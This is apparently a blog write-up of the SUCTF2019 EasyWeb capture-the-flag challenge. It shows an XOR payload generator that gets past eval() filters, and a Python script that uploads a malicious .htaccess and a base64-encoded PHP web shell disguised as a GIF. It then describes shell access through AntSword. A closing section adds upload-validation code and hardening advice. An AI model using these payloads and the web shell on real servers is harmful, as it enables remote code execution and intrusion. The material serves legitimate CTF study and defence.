[SUCTF2019] EasyWeb: the standard approach

<?php
$payload = '';
$a='_GET';
for($i=0;$i<strlen($a);$i++)
{   
    for($j=0;$j<255;$j++)
    {
        $k = chr($j)^chr(255);  //dechex(255) = ff
        if($k == $a[$i])
            $payload .= '%'.dechex($j);
    }
}
echo $payload;
?>

This script computes the bytes that XOR with %ff to give a target string. For example, with $a='_GET' it prints %a0%b8%ba%ab, so the payload becomes ${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo


Opening the challenge gives us some source to audit:

<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
        mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
        if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
        if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

Here eval($hhh) can be made to run eval("get_the_flag();"), i.e. eval() can call a function for us.

Payload: ${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag


Once the payload is passed, get_the_flag() runs, so the next step is uploading the files.


The files are uploaded as POST requests with a Python script:

import requests
import base64

url="http://800193fd-9e82-480d-bb38-d73090263791.node4.buuoj.cn:81/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag"

htaccess = b"""
#define width 1
#define height 1
AddType application/x-httpd-php .aa
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_c47b21fcf8f0bc8b3920541abd8024fd/shell.aa"
"""
shell = b"GIF89a00" + base64.b64encode(b"<?php eval($_POST[1]);?>")


file1 = {'file':('.htaccess',htaccess,'image/jpeg')}
data = {"upload":"submit"}
res = requests.post(url = url,data = data,files = file1)
print(res.text)

file2 = {'file':('shell.aa',shell,'image/jpeg')}
data = {"upload":"submit"}
res = requests.post(url = url,data = data,files = file2)
print(res.text)


Then connect with AntSword (蚁剑), use the disable_functions bypass plugin, open a new terminal, cd to the root directory in the shell and cat the flag.
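The upload handler in get_the_flag() accepts the .htaccess because exif_imagetype() reads the `#define width 1` lines as an XBM header and nothing rejects dot-prefixed names, and it accepts shell.aa because only extensions containing `ph` are blocked. The check below is an added example, not the challenge's code, of how a handler would treat the same two uploads; the names SAMPLE_*, ALLOWED, validate_upload and stored_name are my own.

```python
import os
import secrets
from typing import Tuple

# Constructed samples mirroring the two files the write-up sends, plus a real 1x1 GIF.
SAMPLE_HTACCESS = (".htaccess", b"#define width 1\n#define height 1\nAddType application/x-httpd-php .aa\n")
SAMPLE_SHELL = ("shell.aa", b"GIF89a00PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+")
SAMPLE_GIF = ("cat.gif", b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00;")

# Allowlist: extension -> magic bytes the content must begin with.
# Anything not listed (including .aa, .htaccess, .phtml) is refused outright.
ALLOWED = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def validate_upload(name: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for a client-supplied filename and body."""
    base = os.path.basename(name)
    # Dotfiles cover .htaccess; basename mismatch catches ../ and slashes.
    if base != name or base.startswith(".") or base == "":
        return False, "dotfile or path component in name"
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False, "extension .%s not allowed" % ext
    # Unlike exif_imagetype(), the signature must match the *claimed* type.
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    if b"<?" in content or b"<script" in content.lower():
        return False, "embedded code marker"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Server-chosen random name; the client's filename never reaches disk."""
    return secrets.token_hex(16) + "." + ext.lower()
```

A base64 body behind a genuine GIF header still passes the content check, so the controls that actually stop execution are the random server-chosen name, the extension allowlist, and a web-server config that ignores .htaccess in the upload directory (AllowOverride None) and never maps that directory to PHP.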


posted @ 2022-07-14 12:01  Galio